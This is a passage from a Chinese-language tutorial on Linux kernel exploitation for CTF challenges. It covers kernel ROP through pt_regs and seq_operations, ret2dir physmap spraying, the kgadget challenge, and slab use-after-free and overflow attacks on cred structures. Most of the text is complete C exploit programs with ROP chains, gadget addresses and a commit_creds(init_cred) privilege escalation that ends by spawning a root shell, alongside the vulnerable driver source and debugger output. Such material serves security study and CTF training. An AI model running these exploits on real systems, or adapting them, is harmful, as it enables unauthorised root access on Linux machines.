mov_cr4_rdi_ret; rop[it++] = (size_t ) get_root; rop[it++] = swapgs_popfq_ret; rop[it++] = 0 ; rop[it++] = iretq; rop[it++] = (size_t ) get_shell; rop[it++] = user_cs; rop[it++] = user_rflags; rop[it++] = user_sp; rop[it++] = user_ss; core_write(buf, sizeof (buf)); core_copy_func(0xffffffffffff0000 | sizeof (buf)); return 0 ; }
利用 pt_regs 构造 kernel ROP 查看entry_SYSCALL_64 这一用汇编写的函数内部,注意到当程序进入到内核态时,该函数会将所有的寄存器压入内核栈上,形成一个 pt_regs结构体,该结构体实质上位于内核栈底,定义 如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 struct pt_regs { unsigned long r15; unsigned long r14; unsigned long r13; unsigned long r12; unsigned long rbp; unsigned long rbx; unsigned long r11; unsigned long r10; unsigned long r9; unsigned long r8; unsigned long rax; unsigned long rcx; unsigned long rdx; unsigned long rsi; unsigned long rdi; unsigned long orig_rax; unsigned long rip; unsigned long cs; unsigned long eflags; unsigned long rsp; unsigned long ss; };
内核栈只有一个页面的大小,而 pt_regs 结构体则固定位于内核栈栈底,当我们劫持内核结构体中的某个函数指针时(例如 seq_operations->start),在我们通过该函数指针劫持内核执行流时 rsp 与 栈底的相对偏移通常是不变的。
而在系统调用当中过程有很多的寄存器其实是不一定能用上的,比如 r8 ~ r15,这些寄存器为我们布置 ROP 链提供了可能,我们不难想到:只需要寻找到一条形如 "add rsp, val ; ret" 的gadget便能够完成ROP,在进入内核态前像寄存器写入一些值,看那些寄存器可以被保留,以便后续写入gadget。
KPTI pass:使用 seq_operations + pt_regs
结构体 seq_operations 的条目如下:
1 2 3 4 5 6 7 struct seq_operations { void * (*start) (struct seq_file *m, loff_t *pos); void (*stop) (struct seq_file *m, void *v); void * (*next) (struct seq_file *m, void *v, loff_t *pos); int (*show) (struct seq_file *m, void *v); };
当我们打开一个 stat 文件时(如 /proc/self/stat)便会在内核空间中分配一个 seq_operations 结构体
当我们 read 一个 stat 文件时,内核会调用其 proc_ops 的 proc_read_iter 指针,然后调用 seq_operations->start 函数指针
利用思路 这次我们限制溢出只能覆盖返回地址,此时需要栈迁移到其他地方构造 rop 。其中一个思路就是在 pt_regs 上构造 rop 。我们在调用 core_copy_func 函数之前先将寄存器设置为几个特殊的值,然后再 core_copy_func 函数的返回处下断点。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 __asm__( "mov r15, 0x1111111111111111;" "mov r14, 0x2222222222222222;" "mov r13, 0x3333333333333333;" "mov r12, 0x4444444444444444;" "mov rbp, 0x5555555555555555;" "mov rbx, 0x6666666666666666;" "mov r11, 0x7777777777777777;" "mov r10, 0x8888888888888888;" "mov r9, 0x9999999999999999;" "mov r8, 0xaaaaaaaaaaaaaaaa;" "mov rcx, 0xbbbbbbbbbbbbbbbb;" "mov rax, 0x10;" "mov rdx, 0xffffffffffff0050;" "mov rsi, 0x6677889A;" "mov rdi, core_fd;" "syscall" );
数字没变的寄存器就是我们能够控制的。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 0b:0058│ 0xffffc90000113f58 ◂— 0x1111111111111111 0c:0060│ 0xffffc90000113f60 ◂— 0x2222222222222222 ('""""""""' ) 0d:0068│ 0xffffc90000113f68 ◂— 0x3333333333333333 ('33333333' ) 0e:0070│ 0xffffc90000113f70 ◂— 0x4444444444444444 ('DDDDDDDD' ) 0f:0078│ 0xffffc90000113f78 ◂— 0x5555555555555555 ('UUUUUUUU' ) 10:0080│ 0xffffc90000113f80 ◂— 0x6666666666666666 ('ffffffff' ) 11:0088│ 0xffffc90000113f88 ◂— 0x207 12:0090│ 0xffffc90000113f90 ◂— 0x8888888888888888 13:0098│ 0xffffc90000113f98 ◂— 0x9999999999999999 14:00a0│ 0xffffc90000113fa0 ◂— 0xaaaaaaaaaaaaaaaa 15:00a8│ 0xffffc90000113fa8 ◂— 0xffffffffffffffda 16:00b0│ 0xffffc90000113fb0 —▸ 0x401566 ◂— lea rax, [rip + 0xbb44] 17:00b8│ 0xffffc90000113fb8 ◂— 0xffffffffffff0050 /* 'P' */ 18:00c0│ 0xffffc90000113fc0 ◂— 0x6677889a 19:00c8│ 0xffffc90000113fc8 ◂— 0x614d8e5400000004 1a:00d0│ 0xffffc90000113fd0 ◂— 0x10 1b:00d8│ 0xffffc90000113fd8 —▸ 0x401566 ◂— lea rax, [rip + 0xbb44] 1c:00e0│ 0xffffc90000113fe0 ◂— 0x33 /* '3' */ 1d:00e8│ 0xffffc90000113fe8 ◂— 0x207 1e:00f0│ 0xffffc90000113ff0 —▸ 0x7ffe1d48e620 ◂— 0x0 1f:00f8│ 0xffffc90000113ff8 ◂— 0x2b /* '+' */
新版本内核对抗利用 pt_regs 进行攻击的办法 正所谓魔高一尺道高一丈,内核主线在 这个 commit 中为系统调用栈添加了一个偏移值,这意味着 pt_regs 与我们触发劫持内核执行流时的栈间偏移值不再是固定值:
1 2 3 4 5 6 7 8 9 10 11 12 @@ -38,6 +38,7 @@ #ifdef CONFIG_X86_64 __visible noinstr void do_syscall_64(unsigned long nr, struct pt_regs *regs) { + add_random_kstack_offset(); nr = syscall_enter_from_user_mode(regs, nr); instrumentation_begin();
当然,若是在这个随机偏移值较小且我们仍有足够多的寄存器可用的情况下,仍然可以通过布置一些 slide gadget 来继续完成利用,不过稳定性也大幅下降了。
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/ioctl.h> size_t prepare_kernel_cred = 0xFFFFFFFF8109CCE0 ;size_t commit_creds = 0xFFFFFFFF8109C8E0 ;size_t init_cred = 0xFFFFFFFF8223D1A0 ;size_t pop_rdi_ret = 0xffffffff81000b2f ;size_t add_rsp_0xe8_ret = 0xffffffff816bb966 ;size_t swapgs_restore_regs_and_return_to_usermode = 0xFFFFFFFF81A008DA ;int core_fd;void core_read (char *buf) { ioctl(core_fd, 0x6677889B , buf); } void set_off (size_t off) { ioctl(core_fd, 0x6677889C , off); } void core_write (char *buf, size_t len) { write(core_fd, buf, len); } void rebase () { FILE *kallsyms_fd = fopen("/tmp/kallsyms" , "r" ); if (kallsyms_fd < 0 ) { puts ("[-] Failed to open kallsyms.\n" ); exit (-1 ); } char name[0x50 ], type[0x10 ]; size_t addr; while (fscanf (kallsyms_fd, "%llx%s%s" , &addr, type, name)) { size_t offset = -1 ; if (!strcmp (name, "commit_creds" )) { offset = addr - (size_t ) commit_creds; } else if (!strcmp (name, "prepare_kernel_cred" )) { offset = addr - (size_t ) prepare_kernel_cred; } if (offset != -1 ) { printf ("[*] offset: %p\n" , offset); commit_creds += offset; prepare_kernel_cred += offset; init_cred += offset; pop_rdi_ret += offset; add_rsp_0xe8_ret += offset; swapgs_restore_regs_and_return_to_usermode += offset; break ; } } printf ("[*] commit_creds: %p\n" , (size_t ) commit_creds); printf ("[*] prepare_kernel_cred: %p\n" , (size_t ) prepare_kernel_cred); } size_t get_canary () { set_off(64 ); char buf[64 ]; core_read(buf); return *(size_t *) buf; } int main () { rebase(); core_fd = open("/proc/core" , O_RDWR); if (core_fd < 0 ) { puts ("[-] Failed to open core." ); exit (-1 ); } size_t canary = get_canary(); printf ("[*] canary: %p\n" , canary); char buf[0x100 ]; memset (buf, 'a' , sizeof (buf)); *(size_t *) &buf[64 ] = canary; *(size_t *) &buf[80 ] = add_rsp_0xe8_ret; core_write(buf, sizeof (buf)); __asm__( "mov r15, pop_rdi_ret;" "mov r14, init_cred;" "mov r13, commit_creds;" "mov r12, swapgs_restore_regs_and_return_to_usermode+0x8;" "mov rbp, 0x5555555555555555;" "mov rbx, 0x6666666666666666;" "mov r11, 0x7777777777777777;" "mov r10, 0x8888888888888888;" "mov r9, 0x9999999999999999;" "mov r8, 0xaaaaaaaaaaaaaaaa;" "mov rax, 0x10;" "mov rdx, 0xffffffffffff0058;" "mov rsi, 0x6677889A;" "mov rdi, core_fd;" "syscall" ); system("/bin/sh" ); return 0 ; }
执行 add_rsp_0xc8_pop*4_ret 时栈布局,rsp抬高0xc8+0x20后 ret 会执行到我们的 shellcode。
ret2dir 如果 ptregs 所在的内存被修改了导致最多只能控制 16 字节的内存我们可以利用 ret2dir 的利用方式将栈迁移至内核的线性映射区。不同版本内核的线性映射区可以从内核源码文档的mm.txt 查看。
ret2dir 是哥伦比亚大学网络安全实验室在 2014 年提出的一种辅助攻击手法,主要用来绕过 smep、smap、pxn 等用户空间与内核空间隔离的防护手段,原论文 。 linux 系统有一部分物理内存区域同时映射到用户空间和内核空间的某个物理内存地址。一块区域叫做 direct mapping area,即内核的线性映射区。,这个区域映射了所有的物理内存。我们在用户空间中布置的 gadget 可以通过 direct mapping area 上的地址在内核空间中访问到。
但需要注意的是在新版的内核当中 direct mapping area 已经不再具有可执行权限,因此我们很难再在用户空间直接布置 shellcode 进行利用,但我们仍能通过在用户空间布置 ROP 链的方式完成利用。
利用思路 这题主要思路如下:
使用 mmap 喷射大量内存,并在里面写上rop链。
将try_hit的地址传给rbp,再利用leave;ret进行栈迁移。
完成栈迁移,执行提权代码。
返回用户空间在使用 swapgs_restore_regs_and_return_to_usermode 函数时应该注意,前面 pop 完寄存器之后除 iretq 需要的寄存器还剩 orig_rax 和 rdi ,为了缩短 rop 的长度,可以直接 retn 到 swapgs_restore_regs_and_return_to_usermode + 27;,不过 rop 接下来还要有 16 字节的填充来表示 orig_rax 和 rdi 的位置。
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 #include <unistd.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/mman.h> size_t prepare_kernel_cred = 0xFFFFFFFF8109CCE0 ;size_t commit_creds = 0xFFFFFFFF8109C8E0 ;size_t init_cred = 0xFFFFFFFF8223D1A0 ;size_t pop_rdi_ret = 0xffffffff81000b2f ;size_t add_rsp_0xe8_ret = 0xffffffff816bb966 ;size_t swapgs_restore_regs_and_return_to_usermode = 0xFFFFFFFF81A008DA ;size_t retn = 0xFFFFFFFF81003E15 ;size_t pop_rbp_ret = 0xFFFFFFFF812D71EF ;size_t leave_ret = 0xFFFFFFFF81037384 ;const size_t try_hit = 0xffff880000000000 +0x7000000 ;size_t user_cs, user_rflags, user_sp, user_ss;size_t page_size;int core_fd;void core_read (char *buf) { ioctl(core_fd, 0x6677889B , buf); } void set_off (size_t off) { ioctl(core_fd, 0x6677889C , off); } void core_write (char *buf, size_t len) { write(core_fd, buf, len); } void save_status () { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); puts ("[*]status has been saved." ); } void get_shell () { system("/bin/sh" ); } size_t get_canary () { set_off(64 ); char buf[64 ]; core_read(buf); return *(size_t *) buf; } void rebase () { FILE *kallsyms_fd = fopen("/tmp/kallsyms" , "r" ); if (kallsyms_fd < 0 ) { puts ("[-] Failed to open kallsyms.\n" ); exit (-1 ); } char name[0x50 ], type[0x10 ]; size_t addr; while (fscanf (kallsyms_fd, "%llx%s%s" , &addr, type, name)) { size_t offset = -1 ; if (!strcmp (name, "commit_creds" )) { offset = addr - (size_t ) commit_creds; } else if (!strcmp (name, "prepare_kernel_cred" )) { offset = addr - (size_t ) prepare_kernel_cred; } if (offset != -1 ) { printf ("[*] offset: %p\n" , offset); commit_creds += offset; prepare_kernel_cred += offset; init_cred += offset; pop_rdi_ret += offset; add_rsp_0xe8_ret += offset; swapgs_restore_regs_and_return_to_usermode += offset; pop_rbp_ret += offset; leave_ret += offset; retn += offset; break ; } } printf ("[*] commit_creds: %p\n" , (size_t ) commit_creds); printf ("[*] prepare_kernel_cred: %p\n" , (size_t ) prepare_kernel_cred); } void physmap () { core_fd = open("/proc/core" , O_RDWR); if (core_fd < 0 ) { puts ("[-] Error: open core" ); } page_size = sysconf(_SC_PAGESIZE); printf ("[*] page_size %llx" , &page_size); size_t *rop = mmap(NULL , page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1 , 0 ); int idx = 0 ; while (idx < (page_size / 8 - 0x30 )) { rop[idx++] = add_rsp_0xe8_ret; } for (; idx < (page_size / 8 - 0xb ); idx++) { rop[idx] = retn; } rop[idx++] = pop_rdi_ret; rop[idx++] = init_cred; rop[idx++] = commit_creds; rop[idx++] = swapgs_restore_regs_and_return_to_usermode + 0x16 ; rop[idx++] = 0x0000000000000000 ; rop[idx++] = 0x0000000000000000 ; rop[idx++] = (size_t ) get_shell; rop[idx++] = user_cs; rop[idx++] = user_rflags; rop[idx++] = user_sp; rop[idx++] = user_ss; puts ("[*] Spraying physmap..." ); for (int i = 1 ; i < 15000 ; i++) { size_t *page = mmap(NULL , page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1 , 0 ); memcpy (page, rop, page_size); } puts ("[*] trigger physmap one_gadget..." ); } int main () { rebase(); save_status(); physmap(); size_t canary = get_canary(); printf ("[*] canary: %p\n" , canary); char buf[0x100 ]; memset (buf, 'a' , sizeof (buf)); *(size_t *) &buf[0x40 ] = canary; *(size_t *) &buf[0x50 ] = add_rsp_0xe8_ret; core_write(buf, sizeof (buf)); __asm__( "mov r15, pop_rbp_ret;" "mov r14, try_hit;" "mov r13, leave_ret;" "mov rax, 0x10;" "mov rdx, 0xffffffffffff0058;" "mov rsi, 0x6677889A;" "mov rdi, core_fd;" "syscall" ); return 0 ; }
RetSpill 利用思路 exp MINI-LCTF2022 - kgadget 题目分析 启动脚本如下:
1 2 3 4 5 6 7 8 9 10 11 12 #!/bin/sh qemu-system-x86_64 \ -m 256M \ -cpu kvm64,+smep,+smap \ -smp cores=2,threads=2 \ -kernel bzImage \ -initrd ./rootfs.cpio \ -nographic \ -monitor /dev/null \ -snapshot \ -append "console=ttyS0 nokaslr pti=on quiet oops=panic panic=1" \ -no-reboot
没有开kaslr所以有了函数地址。但是开启了smep和smap保护,所以就不能ret2usr了,注意kvm64默认开启kpti保护(当然-append也写了)所以最后返回用户态时要进行页表切换。
写了一个字符驱动程序,其他函数都没啥用,就不放出来了。就 kgadget-ioctl或者函数有用,该函数会直接调用我们传入的地址处的函数。
kgadget_ioctl
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 .text.unlikely:00000000000000F3 ; __int64 __fastcall kgadget_ioctl(file *__file, unsigned int cmd, unsigned __int64 param) .text.unlikely:00000000000000F3 kgadget_ioctl proc near ; DATA XREF: __mcount_loc:0000000000000653↓o .text.unlikely:00000000000000F3 ; .data:kgadget_fo↓o .text.unlikely:00000000000000F3 .text.unlikely:00000000000000F3 regs_addr = qword ptr -20h .text.unlikely:00000000000000F3 .text.unlikely:00000000000000F3 __file = rdi ; file * .text.unlikely:00000000000000F3 cmd = rsi ; unsigned int .text.unlikely:00000000000000F3 param = rdx ; unsigned __int64 .text.unlikely:00000000000000F3 call __fentry__ ; PIC mode .text.unlikely:00000000000000F8 push rbp .text.unlikely:00000000000000F9 mov rbp, rsp .text.unlikely:00000000000000FC push rbx .text.unlikely:00000000000000FD sub rsp, 10h .text.unlikely:0000000000000101 mov rax, gs:28h .text.unlikely:000000000000010A mov [rbp-10h], rax .text.unlikely:000000000000010E xor eax, eax .text.unlikely:0000000000000110 cmp esi, 1BF52h; if esi == 114514 jmp loc_1a3 .text.unlikely:0000000000000116 jnz loc_1A3 .text.unlikely:000000000000011C mov rbx, [param]; arg3 -> rbx .text.unlikely:000000000000011F kgadget_ptr = rbx ; void (*)(void) .text.unlikely:000000000000011F mov __file, offset unk_370 .text.unlikely:0000000000000126 mov cmd, kgadget_ptr .text.unlikely:0000000000000129 call printk ; PIC mode .text.unlikely:000000000000012E mov rdi, offset unk_3A0 .text.unlikely:0000000000000135 call printk ; PIC mode .text.unlikely:000000000000013A mov [rbp-18h], rsp .text.unlikely:000000000000013E mov rax, [rbp-18h] ; rsp -> rax .text.unlikely:0000000000000142 mov rdi, offset unk_3F8 .text.unlikely:0000000000000149 add rax, 1000h .text.unlikely:000000000000014F and rax, 0FFFFFFFFFFFFF000h ; rax -> kstack_end .text.unlikely:0000000000000155 lea rdx, [rax-0A8h] .text.unlikely:000000000000015C mov [rbp-18h], rdx .text.unlikely:0000000000000160 regs = rdx ; pt_regs * .text.unlikely:0000000000000160 mov regs, 3361626E74747261h .text.unlikely:000000000000016A mov [rax-0A8h], rdx; 3361626E74747261h -> pt_regs .text.unlikely:0000000000000171 mov [rax-0A0h], rdx .text.unlikely:0000000000000178 mov [rax-98h], rdx .text.unlikely:000000000000017F mov [rax-90h], rdx .text.unlikely:0000000000000186 mov [rax-88h], rdx .text.unlikely:000000000000018D mov [rax-80h], rdx .text.unlikely:0000000000000191 mov [rax-70h], rdx .text.unlikely:0000000000000195 call printk ; PIC mode .text.unlikely:000000000000019A call __x86_indirect_thunk_rbx ;PIC mode ;call rbx .text.unlikely:000000000000019F xor eax, eax .text.unlikely:00000000000001A1 jmp short loc_1B3 .text.unlikely:00000000000001A3 ; --------------------------------------------------------------------------- .text.unlikely:00000000000001A3 .text.unlikely:00000000000001A3 loc_1A3: ; CODE XREF: kgadget_ioctl+23↑j .text.unlikely:00000000000001A3 __file = rdi ; file * .text.unlikely:00000000000001A3 cmd = rsi ; unsigned int .text.unlikely:00000000000001A3 param = rdx ; unsigned __int64 .text.unlikely:00000000000001A3 mov __file, offset unk_420 .text.unlikely:00000000000001AA call printk ; PIC mode .text.unlikely:00000000000001AF or rax, 0FFFFFFFFFFFFFFFFh .text.unlikely:00000000000001B3 .text.unlikely:00000000000001B3 loc_1B3: ; CODE XREF: kgadget_ioctl+AE↑j .text.unlikely:00000000000001B3 mov rcx, [rbp-10h] .text.unlikely:00000000000001B7 xor rcx, gs:28h .text.unlikely:00000000000001C0 jz short loc_1C7 .text.unlikely:00000000000001C2 call __stack_chk_fail ; PIC mode .text.unlikely:00000000000001C7 ; --------------------------------------------------------------------------- .text.unlikely:00000000000001C7 .text.unlikely:00000000000001C7 loc_1C7: ; CODE XREF: kgadget_ioctl+CD↑j .text.unlikely:00000000000001C7 pop rdx .text.unlikely:00000000000001C8 pop rcx .text.unlikely:00000000000001C9 pop rbx .text.unlikely:00000000000001CA pop rbp .text.unlikely:00000000000001CB retn .text.unlikely:00000000000001CB kgadget_ioctl endp
不过根据输出他提示信息, pt_regs 中只有 r8 和 r9 寄存器可以使用,寄存器还有 r11 和 rcx 的值没有被覆盖,但调试时发现其也会被覆盖。
利用思路 这题主要思路如下:
使用 mmap 喷射大量内存,并在里面写上rop链。
将try_hit的地址传给rdx寄存器,利用kgadget_ioctl去call rbx。
完成栈迁移,执行提权代码。
返回用户空间在使用 swapgs_restore_regs_and_return_to_usermode 函数时应该注意,前面 pop 完寄存器之后除 iretq 需要的寄存器还剩 orig_rax 和 rdi ,为了缩短 rop 的长度,可以直接 retn 到 swapgs_restore_regs_and_return_to_usermode + 27;,不过 rop 接下来还要有 16 字节的填充来表示 orig_rax 和 rdi 的位置。
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 #include <unistd.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/mman.h> const size_t try_hit = 0xffff888000000000 + 0x7000000 ;size_t user_cs, user_rflags, user_sp, user_ss;size_t page_size;int dev_fd;void save_status () { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); puts ("[*]status has been saved." ); } void get_shell () { system("/bin/sh" ); } int main () { save_status(); dev_fd = open("/dev/kgadget" , O_RDWR); if (dev_fd < 0 ) { puts ("[-] Error: open kgadget" ); } page_size = sysconf(_SC_PAGESIZE); size_t *rop = mmap(NULL , page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1 , 0 ); int idx = 0 ; while (idx < (page_size / 8 - 0x30 )) { rop[idx++] = 0xffffffff810737fe ; } for (; idx < (page_size / 8 - 11 ); idx++) { rop[idx] = 0xffffffff8108c6f1 ; } rop[idx++] = 0xffffffff8108c6f0 ; rop[idx++] = 0xffffffff82a6b700 ; rop[idx++] = 0xffffffff810c92e0 ; rop[idx++] = 0xffffffff81c00fb0 + 27 ; rop[idx++] = 0x0000000000000000 ; rop[idx++] = 0x0000000000000000 ; rop[idx++] = (size_t ) get_shell; rop[idx++] = user_cs; rop[idx++] = user_rflags; rop[idx++] = user_sp; rop[idx++] = user_ss; puts ("[*] Spraying physmap..." ); for (int i = 1 ; i < 15000 ; i++) { sigset_t *page = mmap(NULL , page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1 , 0 ); memcpy (page, rop, page_size); } puts ("[*] trigger physmap one_gadget..." ); __asm__( "mov r15, 0xbeefdead;" "mov r14, 0x11111111;" "mov r13, 0x22222222;" "mov r12, 0x33333333;" "mov rbp, 0x44444444;" "mov rbx, 0x55555555;" "mov r11, 0x66666666;" "mov r10, 0x77777777;" "mov r9, 0xffffffff811483d0;" "mov r8, try_hit;" "mov rax, 0x10;" "mov rcx, 0xaaaaaaaa;" "mov rdx, try_hit;" "mov rsi, 0x1bf52;" "mov rdi, dev_fd;" "syscall" ); return 0 ; }
流程:
在我们rop处下断点,发现执行到我们喷射的gadget处时,r8(pop rsp)距离rsp有0xa0大小,找到add rsp,0xa0;;;;ret样式的 gadget即可将栈迁移到我们用于提权的 gadget 处。
(1)利用kgadget_ioctl和pt_regs保留的r8-r9完成栈迁移。
(2)栈不断抬高,执行get_root。
内核堆利用 heap_bof 题目分析 题目给了源码,存在UAF和heap overflow两种漏洞。内核版本为4.4.27
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 #include <asm/uaccess.h> #include <linux/cdev.h> #include <linux/device.h> #include <linux/fs.h> #include <linux/kernel.h> #include <linux/module.h> #include <linux/slab.h> #include <linux/types.h> struct class *bof_class ;struct cdev cdev ;int bof_major = 256 ;char *ptr[40 ];struct param { size_t len; char *buf; unsigned long idx; }; long bof_ioctl (struct file *filp, unsigned int cmd, unsigned long arg) { struct param p_arg ; copy_from_user(&p_arg, (void *) arg, sizeof (struct param)); long retval = 0 ; switch (cmd) { case 9 : copy_to_user(p_arg.buf, ptr[p_arg.idx], p_arg.len); printk("copy_to_user: 0x%lx\n" , *(long *) ptr[p_arg.idx]); break ; case 8 : copy_from_user(ptr[p_arg.idx], p_arg.buf, p_arg.len); break ; case 7 : kfree(ptr[p_arg.idx]); printk("free: 0x%p\n" , ptr[p_arg.idx]); break ; case 5 : ptr[p_arg.idx] = kmalloc(p_arg.len, GFP_KERNEL); printk("alloc: 0x%p, size: %2lx\n" , ptr[p_arg.idx], p_arg.len); break ; default : retval = -1 ; break ; } return retval; } static const struct file_operations bof_fops = { .owner = THIS_MODULE, .unlocked_ioctl = bof_ioctl, }; static int bof_init (void ) { dev_t devno = MKDEV(bof_major, 0 ); int result; if (bof_major) result = register_chrdev_region(devno, 1 , "bof" ); else { result = alloc_chrdev_region(&devno, 0 , 1 , "bof" ); bof_major = MAJOR(devno); } printk("bof_major /dev/bof: %d\n" , bof_major); if (result < 0 ) return result; bof_class = class_create(THIS_MODULE, "bof" ); device_create(bof_class, NULL , devno, NULL , "bof" ); cdev_init(&cdev, &bof_fops); cdev.owner = THIS_MODULE; cdev_add(&cdev, devno, 1 ); return 0 ; } static void bof_exit (void ) { cdev_del(&cdev); device_destroy(bof_class, MKDEV(bof_major, 0 )); class_destroy(bof_class); unregister_chrdev_region(MKDEV(bof_major, 0 ), 1 ); printk("bof exit success\n" ); } MODULE_AUTHOR("exp_ttt" ); MODULE_LICENSE("GPL" ); module_init(bof_init); module_exit(bof_exit);
boot.sh
这道题是多核多线程。并且开启了smep和smap。
1 2 3 4 5 6 7 8 9 10 11 #!/bin/bash qemu-system-x86_64 \ -initrd rootfs.cpio \ -kernel bzImage \ -m 512M \ -nographic \ -append 'console=ttyS0 root=/dev/ram oops=panic panic=1 quiet kaslr' \ -monitor /dev/null \ -smp cores=2,threads=2 \ -cpu kvm64,+smep,+smap \
Use After Free 利用思路 cred 结构体大小为 0xa8 ,根据 slub 分配机制,如果申请和释放大小为 0xa8(实际为 0xc0 )的内存块,此时再开一个线程,则该线程的 cred 结构题正是刚才释放掉的内存块。利用 UAF 漏洞修改 cred 就可以实现提权。
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ioctl.h> #include <unistd.h> #include <sys/wait.h> #define BOF_MALLOC 5 #define BOF_FREE 7 #define BOF_EDIT 8 #define BOF_READ 9 struct param { size_t len; char *buf; unsigned long idx; }; int main () { int fd = open("dev/bof" , O_RDWR); struct param p = {0xa8 , malloc (0xa8 ), 1 }; ioctl(fd, BOF_MALLOC, &p); ioctl(fd, BOF_FREE, &p); int pid = fork(); if (pid < 0 ) { puts ("[-]fork error" ); return -1 ; } if (pid == 0 ) { p.buf = malloc (p.len = 0x30 ); memset (p.buf, 0 , p.len); ioctl(fd, BOF_EDIT, &p); if (getuid() == 0 ) { puts ("[+]root success" ); system("/bin/sh" ); } else { puts ("[-]root failed" ); } } else { wait(NULL ); } close(fd); return 0 ; }
但是此种方法在较新版本 kernel 中已不可行,我们已无法直接分配到 cred_jar 中的 object,这是因为 cred_jar 在创建时设置了 SLAB_ACCOUNT 标记,在 CONFIG_MEMCG_KMEM=y 时(默认开启)cred_jar 不会再与相同大小的 kmalloc-192 进行合并。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 void __init cred_init (void ) { cred_jar = kmem_cache_create("cred_jar" , sizeof (struct cred), 0 , SLAB_HWCACHE_ALIGN|SLAB_PANIC, NULL ); } void __init cred_init (void ) { cred_jar = kmem_cache_create("cred_jar" , sizeof (struct cred), 0 , SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, NULL ); }
Overflow 溢出修改 cred ,和前面 UAF 修改 cred 一样,在新版本失效。多核堆块难免会乱序,溢出之前记得多申请一些0xc0大小的obj,因为我们 freelist 中存在很多之前使用又被释放的 obj 导致的 obj 乱序。我们需要一个排列整齐的内存块用于修改。
利用思路
多申请几个0xa8大小的内存块,将原有混乱的freelist 变为地址连续的 freelist。
利用堆溢出,修改被重新申请作为cred的ptr[5]凭证区为0。
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 #include <stdio.h> #include <fcntl.h> #include <sys/ioctl.h> #include <unistd.h> #include <string.h> #include <stdlib.h> #include <sys/wait.h> struct param { size_t len; char *buf; long long idx; }; const int BOF_NUM = 10 ;int main (void ) { int bof_fd = open("/dev/bof" , O_RDWR); if (bof_fd == -1 ) { puts ("[-] Failed to open bof device." ); exit (-1 ); } struct param p = {0xa8 , malloc (0xa8 ), 0 }; for (int i = 0 ; i < 0x40 ; i++) { ioctl(bof_fd, 5 , &p); } puts ("[*] clear heap done" ); for (p.idx = 0 ; p.idx < BOF_NUM; p.idx++) { ioctl(bof_fd, 5 , &p); } p.idx = 5 ; ioctl(bof_fd, 7 , &p); int pid = fork(); if (pid < 0 ) { puts ("[-] fork error" ); exit (-1 ); } p.idx = 4 , p.len = 0xc0 + 0x30 ; memset (p.buf, 0 , p.len); ioctl(bof_fd, 8 , &p); if (!pid) { size_t uid = getuid(); printf ("[*] uid: %zx\n" , uid); if (!uid) { puts ("[+] root success" ); system("/bin/sh" ); } else { puts ("[-] root fail" ); } } else { wait(0 ); } return 0 ; }
tty_struct 劫持 boot.sh
这道题gadget较少,我们就关了smep保护。
